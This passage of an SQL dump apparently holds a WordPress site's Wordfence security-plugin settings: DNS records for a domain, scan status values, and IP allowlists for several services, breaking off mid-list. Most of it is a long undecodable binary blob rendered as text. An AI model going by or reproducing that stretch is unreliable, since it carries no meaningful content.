0S[h(oe=\"_$UA<Laifcl\nEϷ}̣J4\"a.RۭTI58Yl/ʥa\rWg/_a\\ޮ{cnȡx{SξUе4p-R\r|Q;m2oh\Z/AtXdUxn88%V}wdl2Jbey\Zi/Krs*2T	u hTNuo8(7GR\0OT袉\\AX4ɭ<Me;WoN^n~>[BLdj3ylP[l>)6b}\0;/Il/}$W|H#NL-!lE#ac)Fݟ`6vJ49Ml}h?I`mO5ӄ^B!gc\Z;=5*wwWf{c;	`ɗ\0bȓw$>_\Z\"W}:ac2vY4e:[(H}drJmrja~>y[w*dEyPd;9q\0K7)vwHf*9T>ڋɊd?Na\"zk	 neiWa;EK/ڟ<قkÕ7$Ӱp-7iAZ42AFg,c؂=yJtSyKMmp5LpgyXVxlٝ\Z\Z&@dH`e?\'b}D{%\\؁d=[\"Tfl\'E\nqKuxUE aօ79w}sg0=8G]!If\0\0<茽PT9^˨ds\ZHMU\n#B}x*@YM铚i]<׺)Y0?S	IjX\ri#oeksR\Z7`>(-\"\"r0J/\n/s~^Xd;C4@mڧ4ʻ7{sNW+ը`vtQ\Z+k*\nnG5AV}#}ar_M󥾾{oKx^4TS&SK䑮UA$:c>0/X|+WvRɥj%k\Z`O]/*~Go>p7#fD@FCUez=\"87lK᪴7cVMu.;+dT<hAX>1Yeb==6Fi~Y+CNח\\{\"bdfy&?=%X3pXֶ\ro\r8$;61&/b@`A@ 	؂ ,T\ZW=;ڤnHʌ)+NAQo*k\'6ь]/ӻ:΀Ŵ#;39 l10\rA/%!Guȭ?76`dzvT혝H\n`k,\r\ZYGT\\݇\'oy&ɇڊ\rVa6@\\3a(Z@(;r齦-I(;3]ՏWw)셟K<HT\"h8dubzlfrHoRvg)^+CNJ7v?!5[oludCzrHX`lZݗK{2XfYg	U?)@nw6eڼ6Jt|!zssq}~抂,m51QOȀŞ8}Vj/T;vC=6^n[}]VmrrGH:46xN7FÁӓمyQ>1T`37vm\r!2Ҿm9w]fYoQFWz1h+h\rFd*:_4b}>bBuWt\rmHޜQSuEt\0`5ZJ7H\'@C#1^a|n3Ƴ]鄢owz<1^eEr*<+mQ2E;9;^I0OgTGl?\nfoG\ZH1D^5}\0Z.sS06ņ3\"Xv9#dZ{q}͕;D^4ɏJEn≣[AXG\Zh,_؉1W\Z\ZVX<mV*uQ2-Wue	S^_OiEZ%\\3^\"/ԍ562*+ؑim>\" aƵk\\xJI`ɚ<\n eC|=:KCC.{\'﫟vwk8 |v\'MSq~vL ZdVKpvSj3դu~u+TAuA_*ҩ74I]Dvt3UT6dw,kd.G;yRyl5ZG52\0~1Yv2-\\Tt;3ПTMtp\0L;t\0P\r@ g=2v\"mD@`m1LdQ!:b@@*j^<ߞmvn֪B} 9f}ztA+f<[b]e-Svf;V(\rRJ\r܍ť<-3;K\"r@׻_ v~v^OA`Nh\r\Z`)\r`fE	w»p=>z~8hxiVa~ke,NGHPjJx %}J6:i6_Ъm$o,fN,6	֋D\r\rjb\Z;s+LGv O;GwԸsݶ<C|`̀z<ၑ5F\0m-h|͘T?{)!\"=2[Vmx\'Cjf%]jec?lU	aLjGIRbv#䰅Brl_.7?ܝ]XR-~f\\JG,a_mM%{?]\\bY[y&рks!fp{tcjMo|iF]%OpkcI_{-JY^j!,ZuQ *`ҸR<gȜ5מw[j({7{jX9\'u.t]4n\0 \nU[$(v8qٜw\n8	ueGrUWqjz=;>:]!\"O\0-K-\0e`Nflf풦GCwe\'\\|vys7T4$a_fĪy!J&+@_]%_3z%o}+ĦǝU;4!Cz\"cM_RGM̜њo\\[XnzY3OzM{44XGD*v93ORAdLU9\\\' ۗӶ++܌\'.Lchl1%̿IAr\"Vl\'dMM,RBP_vj~{AX>b<~D0``8?5\\OU b0CͫK31Lș\'ݿB	Җy[_)\\fZ=zϩQL!]a\'^F:&:D^ji_b?b{wֺ4Ve,PD\\WA9>e*5!{n\Zӈq\"4sv;8M;T\r`i\\V\nz1۵%l[w؀U+Tk\r^aIYJl	BgoONOt2\0{1~mn(i`=x0\n\"e~`盗+Q!\rtGҢPTM%sw@lcòtV>Тӫח\'k[y\':q	r3滉+JK@jx$m0QYzonF\"}}~>ǫ40cbx;.T~^#90\r8	ul^j=zɩ=:m>M\nD\r԰yriS3 DO0ov^UVpX\0DJ^0K:M*{\0:w3e>OJ@~$@#^5lzeiE#(B: Tx\';ǛWWXůWZ>jT@Imfͥ*h|lp&;mNRː3XsE3ADjQYj{XB.6ZM)\rFsFi8D\\]noJ\0*;9\nXlюXB݃Ji4WCZV4ukJ}ڎᢖ$<Tjd7ybM	eO^=s)Pc8HaFAZo+L0Z%lZlHx.yD\"ؘۏX2!*+)Q^%dB$wj\"5Wۋb3;,\rpؔH4hb0y\0z EՙW:K\'K7͛?]sa8;3φT\0~Nߋ.j\01뉴ݯuEZo߁&iZۨ/}!Dм쭖V[o5?;m\ZW]kȧIkΠ741\"W[.rs\0ҿHS+՚ƶ8ӆqm]Ⱦ ׂ8sSkc>(~/6;ԴV0v\Z|ADfX8ʛąy\"TطpWuZ@`-gd*X\\늳;-(VX`2AŢD{J<?4>T)D\Z*<q@:0~KlY(j l36/FR/]ZpU)(2+?ZH҉Rai\"K C`/7 W9m^lڮ`x#C?`Q)dc}5sMmNr*]m)ۀ\'Z[2?cq]mp}V_=:~}{wuq_+\\w %\Z.ewL;]M`0ILo-/-y(x~x}leqrgG#,aj.vz-ciGf\'aa,~ڼY)\0~\'Pj0\n$KМ:=!ۉA2\'K+lo-ݛ]3bsSYVz6\\\0N\0E.G3c\'\\Ǫ^\nkX\Z̋[XH$pk5So(vЊK\\V@H,M	Ԏnuz7k- 7+TFԷH/n\n3dӤqi|o`s*0\rIK\'Yb\0EiMXFh\\Y8u4&K\\A]V^Σ9Wz =V\'=Юd}=a{Vþe%˫㟮^o7f(]61G\"YZpoط})NѼ弄GfsEnt$%#sPQS軭)֔Tzx$۾{cyrr#U T@D7#iYgN%Yݮ%^\nނh6w~Ũ7k\nkW$|~b+2w\'MR`)V\"B\')Ha_g@7<T\0t3|Lj	dA<sR331H`WSf^/e-N+_yyvbF\nzntHJ3@rDHŊ_ٝL* C㦘WWo$+2Yv4dLQɡƔjLx&1d^/`G˪>O~釳\Zmpi\0`g\Z#(nGg+6iAc(ckUiu8?I\ZKVS0QdŴIڠ1yoT[dsZz-n&<GƲGtERj	z[4	NW\n@y\rt_۫A]zZeEAwaWAX%Re6Te<yxOhv\r%wc\ZA>ՃR5vώ?[^u5P\"\r.W&jD :JJ T\'\ZT98YE0&(dZƖ:ZL@:T-(cW{FWZrF܆(xqGvo_9/fpub#yleD@+#[pLE.\'K?^a-\ZȢk3U{&(u,ۙXUw\"ܳnWa\0OĖ$W\'xHABb=u*z\\Ⱥv߾پSaAuQw?oN~}v>Q9\0{c nL;\n+Ru)b8ڤ4f̲SE+bVn+̈́8F@@et@.TA8?\"}(dc#$&L9w߯NLKm;lswq3Nˏ(E/@[ܰ8e~_)-Iyo}w/lm.LIyBgaoa~ƌ	\n]g[XI_j}RhTCjEn,#HW.3`5fWi(뱞Ut3M<eFj*5dc>7?k\\`F-#ec\r?DUeg\Z\Z¬\\g=*H[e7/Kw%\n _ K)1Ӑ(YCb\ZCC\Z1d6ަ`;2caP*6H	|_T%	K|bJ\'\0nb $fj)ObI\Z}F܂G#n{ފ	2Js%QRz\"($@د#i~?I՛oYɕ0V[v`o-\'cek(`(SoyI肅EQ),>rH*^K6\ZJjyenjR~4?u>f|GV\ZzEGsRkzuv=?[R\"y6)[t\'lRMAXR-hO\riP]XʣmQQx@\'S6=Dc(ڙs8Zww<>X\'NY쿶;1{ѿ~\\?_]\\m_mF.^a(ow>M\Zp\\Ssػ\rv*EDtA,{oя1w~&-v\r#39}~`\0BԈObvIy6\'\\3,`;Q-6M⛽P>8r5AsEq\"Ey!ɱ9Uk(1ǀlc\r^lnnٲ|̑	FjXPyYq&*\"ڙx	4+|ǚI˽6>>VNgcAdT2:S6Y~L``>/)|vzs~PF#w=udM6y֋hĄḑ~9AG?\\>ZxY]77mvT$ϯ\Z?e(BQ@B跗7W/^]ڃ\nrzuiԄ=`\\OY2p\rh7Y~SOvw	#TAs&tXQBRYH}TX0O9޽F?s>`AeOi(Q\rAŊ/j\\K<|h;~fszwĈAϢb2\0S)]m\011Fj$\',:5h5߱Oh6zYL/6rXRzO-D	\"b9JU;s?煐G,2{Gm7ah^~Yǟ7\'|Npor>	qh*ԍ|Mwݎni~Rw><$qaLJ![!>\npn&p>-@O1M?,\0+5գחǻk]@gAx\0T\Z-/KR8*KHz>c?!ln/6ׯ~#-c@kzCV3X0:]s\"*<6fHVO:eﻻ\\ޞ}sUDquP \0D$NҜ$ڴVyi~wR}1XĹZRg,H&1\0e΀1$7nZ~͏;_?88;B݌o?TʲNN9ь	,B@Ue28s]?)@C|[UFwv&K9jI#lJϒbBEK櫆˻O#Ovtp[GXO]GK*\Z1h\0;dpА:LѶ^kvӷXG+ro}~9A\\y7ļjCgJY#5[1eҙV4%蔲fZp>z^\\=z}fC飳=!4A,u!MDz7} \"4zŰ-~$baQPM})uƄx[L\'Ӕཱི)R ϴwa]~(A\n?:gHl`B5t~ATُNChݔ̂ROV~\0aVg|V:Nk\"S0`O#߁%,f5mw\'o~n_ݜ]l{ְmsKfbGJVf}\ZX4ԦЀdӍݯ_W}\n|s};U=z}s˃EѿlgP6yՓ_ٰF*{m~O_~9-4a\ZF:ֽXAùq֧\nik6w_^蟞9\nc11RBܩrVTS#uHFW]6UgbUD-K!\Z 4Rr	!Q4\'u?zNc(V8qj)&CB<PZYKJyTfөk2^FI\00Яb;^\0#g\r0R!#WC\Z[P#, Tw-bΎZ!+3na#jRᱡ1\085$K x2vЋeb)OOg*^<Ib\"S׍w	/&a%lWL{xE\0*Q-ү?AjtQ`fpmfJD]QPk\npDJ;[ƾa/?\0iy ~pICJǈy`Y\npp\0?};lh)wu!KzPf0\nyH~sr@El5=\ZKoHSjXߏc\r)Td5dFh7q թ6MF-=0\Z;>bEpa1Oa4bLjs\0 3jX&uPAYccfsT>N7i$2=1Y4kEKIlث)2H\Z@O?({_g׻ECȞY<fi^,(L㪥968#OoRgb~G푄I8hITAɩ6?\ro?\ZM\"\\HG7Zɽ!ײ\'~R-瓥j,[=!sMw56ܧ`sD16\nAp\0˷ގwX,4nqTxyxǽgD\Z4gE$>@LL4rVZ$<\0͸?U6nbQuKxzEi`*C\\eCLD(@)J46NcOzs}|ݾ!wJ@^x\nL408iKyu0^̹,[[\']8R%ĶPwl]ab{(˻=˜)]G\nO~fo/;/}s]qگ>n]՘,puj;Pڂ:`\\--EX\rbAr8aCٚqEހ[t/샢,n;Ú]u7m\\>fg;oV{<,z4	/KƍDMYf\0\08&\\bUX̪VS6j0־Z?W~z:jv IO\"h?J3(\'J	6l\n@<yG`bg{NZ~I?pjIpf[kJZwm{O.>QR;>@; `r@	; 0<o9}=Xq\ZMkYўtrJ쬤`##\Z\0su=_p}.-~3BqbYtVj%ڲj)kenq88گ&:\0tD,vv0:B0F}\'l!Tx~13>Y&7G*T(F0)Pd8^5Mzƃ:Ӄ:^ؕ#Zy)L6c\n%!Y	l=!\"=`Bi\ZlR0HLNfv{%K,Rpk.bnlǢ{P +U2;Jv.X}ɂzy.Tاx;SD\0tX\0DuĄhvVW>L|[ޮۻaoV&?Yj|5爇dd\":}x΁=ݬQI<&X,lcE +\Ztz[^\Z4\"\'ZSom;\\j )LE0;rN1 Լ6eEwCl/6gÖHfgxP )Od8K\"U`#;`侹wAObE j̉? 6$Hfj-jH0[qnhsHtFMC?e2nc9+8va`#d[W_W&	X\r=+@ϵN\0EF{c\0$T`#@HdN̎(iaFnv,TPbTjs&.	9$TGn7wը],cRwSY=G	0ZE\0hZ>-F\\_\\U|&FI7dvY>^h>:6Vn)x8®嗀n;4d̈ vCղ/8`Kk}<[I+B}}M}WݼӪ$hU	zn*@6[KkfoYSrmgE\"sETNzI1IWp s`\\Dw\Zg̊W&pc)綇v,Qs9\Z}$Uy\0m@	9F7Won9zR177jrbCt!/5UKqKv#쪶Fט\0\"!%vJy x2!9QH4u{~R-UwPJ>ANͱ4\"Ntj#\Z,xρk-{z<VHLlG=ZP1mx|X]nʗÙ36\\l~9ڜ^te0ifD<Ӄx`F7&FIOnpygC)cȣ:.O٘}їk}Xyan8N\\kP#MFq\\FJbvDvgO;5=TG$fT,05FfЦ)gPLAc\rskĮo]$<-@+O\ZRp+:^<JjC2VLUK7\nf^Pl%%1fg#F;KnI*>kыV\ZҢ;MFw,p.F7OpIv~,ZL3eC5-2@)bh5tJk!4M=aLK֧b\'`;;]ɲS(NFKl}ll*6^ۤdPZg\0DA#)`6|nk! DɀY;vjh[\\}8TyFm	|)ez>.r9y\'{VE\0f0VBНBE$ش9yTP=9i~\Z\n%rPz+)FZP;CδX<.ӥ0XGth,敇pbB\ne{O3cƃj]lN<ӫ䰧O%X[xC|Y[b;-(#ie;wA@(µ$vd{zJBLQ&ZJiT+~(f}x;{qv~vD+55BCH@ePt\n=Ab?ot`)tߺ7UΦS\'Ήkw\0VPW\0\nڴ!{;uS_}\n\nKYӴ[k\'!X\\OK\n0$#r|%llumP(0#ۄ_Sʎ]1޴lGv`bsԳ.5A\'5M]VPhjSiU;pҷx?mE&r	ʲیُȇ@{ؿd};mNzSwc@y4[TPhWLuq\'\n{Aw!ẩ)x|:Z,/)D[l\"`/]X1ю6ʞd+Ea7$譌HX8Zњ\'}nS$ts\rp6{A+X3#K\0Le\Z\nC+T%0Um!!Xkos&bײw)|꯺Zn/𝇅\Z>G.XQY.md96~K]Kwk9ӏ@l{ruƞ8%79K+6a5&P:DIm\\\0{I<\\\"\r}쭇:~9*Pg-v3O<î7BUGz΁dz@	ǆ6j[J7C?N5o2Ԫ1r1A*\'y>۽+I2a#+)n%rÖ)L_S1j#\"OKʁN.\ZPetl-_Itg\\?uuZ\0x3h\'H	zs@ D}ȇd\\I\0!?T</ڨ@N&!5:R&	2+B Xl7]Ylº(qpeNұ1Ry;(1T+\0[K9RT-)7C`e0hj΋U@ib5Dagĥ7R\0<F\\,_{t\'PŊIFlT2\Z2\rMcof.+\0G0H\"YZ(͵J?1U9uWHW.FLD [^͈v0(<\ZaE֜H&dgkR[W|sӏ7g\'_[bʮ	;eB@ߛ66!DzN1ȇwkFEo=#.ks}ɕz`Ȥ.P@ii*|3o.1QGrLdxj|f&X R>Jih&/^lo~:v{`ŎDi:|9a7MeQCAb&.΂(aщ\0)k+\0b!i.\0>dcVKc-`؛βD\"56xg|>>\"O膑ŵ0n5GC#$[bxU\"&3i6LIXtfROOgRh<(h*@.87zsB:#th!\\ϴtO|S/$?ވ0M#iX\reWX,#{rjD|=ݼ>;8`1a;#qutQgU\n\'G6a\r+\"sdu=t?dp{g<|<DSҤ6:k_mTah\0}No&nכDMj!	Ns=\Z!RtB	f^zd!g䜤a謵7\"--2@,Ȳ]WUd8\0CZYS?z(뺳æ>l0wmdl6:cUi6̻+gL-t>lV7\n@쥙]cݵT,\\טBȼt-̒@YV>r .>(/>g+EToLɶ`w)SpjIX$\\2OŅ_o.W!\n\05Y\"Z#n$$U:%=\'h(F/j1d\\Ԙyq~u_;Q[ۢ79o%:\"%pC)~[yK?\Z/7͡BlԦ\n`Pe!K=%]PYN1\ZsS\0<䩄:;5\ZV3i[\r.Vzr_ê3OW)f`_M\riaHM\Z\r	ժS(d7khs[=(RP\04{ʈ֥|=lm)\0\n؂ML;\\e\"LS ecbAU啧AcH6il/R1&vf+$3sΑ\reߕNPmxkM,]Nk0\0JC~3#稩$6\0u#&p3=B|{Onʡ\0=霳`@v	`_*=d 5OIA\rM@*KJ#(M,.hٴ$*s~y\08RK}?z:v؃13Zh\\?A㓤8E5*pKb\074Ͻ<8.^_]kJq^3kM<\0EO`6*\0}a}|NZ\0V(NL,\"/IjMZc6i1c0.Ճ$c*~?5}Сk䚳U*WѣzWh4L, &`SΘtrÃ䙊/YNYxG0\r3s×%Qm,4X-J*e{71`<,c83ߖJ:{RD{#\"J\ZlÎ7u8`>DBPS^kla;]˩	ԒiN!\0~A$SO-,,zȦQO剝\n!brFGӂ@A\"zښ3a꼂+d9\'ۣSZ1]lO6[I*~/5[(Œ2Y!>f$q;2*87>ɥ\0=lƗ Pc0ϾJ߷/8ժsu8WtC]Nҍ7޺\00r\Z\"6hȰ`55E.pq-BgeUyR]\rdһTFȱe\0C	TLE6~,961\'wf:\nbm8#;پ\r7+n4`-!Ө5!̾!\rẛ\ZHϸi7⩡\Z,}H5E(6T5ntW\n2`ó[qz0zjT(:wꢥN9re@E\'Z܁Q=O^ޭ̸e0`M^Wѐdlpc0z+1,L@KrNu-VXن;(66@2[x-{ūvi˒/-ւ^bOݶMiyU{I&F@!^{wK;숻=,jn L)4m䡐l\0Lƪ)5~*TkۮQ3j\"0,.h1\"@bh0zw\r.4FչijURuϹӈVMqy Rt,<+%Rzsqoށy=6݄df3:m:iOp;b01cw}NwEԘN9\nFCy/3*fuZhmАr\\\nuus_\'\0Hh}G^sv0(oLGJg\0}esX 7\"BYl4gNPg!$^3SZo3חo,\Z,n30ҩ3:&\'gP)f,NiT޺3A5nޜmykJaNM՜Lz͈#;==Z=emؕwrّyXkBtMejRE04W9ڼ:MY*SiG]u2eIQ	T^qui=v,nucb{UԎ4k9F\Z\")M0Hk>\0֖_x@-Ht[x64a52H;L.]].`xp^Gq*4&}\r8Nl6~gY\'~43fl~I`K\'(O`[KhGx;?	{qեAŻ̓qukT[-(͸;Dk.>2__q2M%h]Mlf+&3α<r5\nH./RU\\\0\'C#u&C$lRhIm*dLo??;Гּ̰1\Z:TޣG(>qQzl%\'ۿ}j3U6I3W@{3f\0.Dj	z&cPoe<E_7c)YBxVhCMҘS˻ڢb\noA37sCLWlﻉ5ĳqMb\'+}ͳ]!20(x6pP1snRv`%41\02I0N4y<=?<3z{.(J7Ó\Z]CHAXAz\r]q{aEbBo *g>S=\nL9aM>\r񺱶$đj>0o{î:GAg:pҁiD.Y oOHTv@cL&E%<赵,s}k!ihǕ`§K7<r\'mЇY=-NQ:ЁLBąxFR>XP@b3gw7W=[Ҩ4jlOE\"3@y\"#tJPC^,78+\'ܞlo$s<F|ChSbc	CcbՀsl~Px	e]Bt#dψ\0%`YScgԩT3h2ZC\\PWAvAxKUxҮ]cQqT`RWd<Yꐚ&#\0FnJ_6/nY\ZpD@Fm0f\ZIs02M\rmElydPE1nAOn,HCcgn;9|AC7el\01@:ЊLP! ä6$ǬVA6lXJ{eixT0ZQzQxV^!,F9daI$i4\\w(a}A׽TpA@CXIG~Ɔ\ZUFU* S\Z\Zb]Jxo7R\ZO3l#8:M?<>c\rwrGn{Sz\0G k&Òy\"5?)El$Gk˥b0ip@J+:dL2Q?Vg38\" ]kH|HG۟燍k\rCtD:*ԃM}eT\Zy_P\n3v?f(>P{@n[sw-˂g\ri		Sݾ?-!~{\Z?i4|\r\'>!\\]n\Z.^?~/vKOwW;YWW;qsTquonNϯ<z::qyv}{E/^pn-~׷wW~뛫Ǽ6zvqu\'=\\\\o^>ӳ1nx|&w{strv{߆I~yu\0.6{G}+O[]\0#\"G1xꧣ볿m1X-9?WѫݷmN6|*G?#xG^ƾ|y0G\n=\\\\]l~F~4߼L1kڽ_o~9Dz	{֓S?pEKt{y}ݾNޜpK=BN\rm =O7A?79a$_ߜϛ߇kߎ~%f_SPNnIuz*T6W/\\2qOm&\'\'vCd߸_KH9iA\'TB8c;9F{)!mHEqEzaNo<,OY؅ag?x.><:Kry.oշ]@=,hR,w/aH??o[ۻ6~gşz\ZѿnΑlo>]tmV0y77Sl?ln_>7aQ\ZWNǧ%99=CxB899q\0񟉧ofS!n[]\'Xlf?kb[OfkN/˧?&6mr9>vF.9wSzy9ϗ|{§k\rNx5\0','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_dnsA','companyregistration.online points to 199.250.217.134','yes'),('wf_dnsCNAME','','yes'),('wf_dnsLogged','1','yes'),('wf_dnsMX','companyregistration.online','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1567012426;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','1566d23f4c38d628ca2fc87ea982fcd59e358f6ccc3b9d794af3916c1b138f83','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880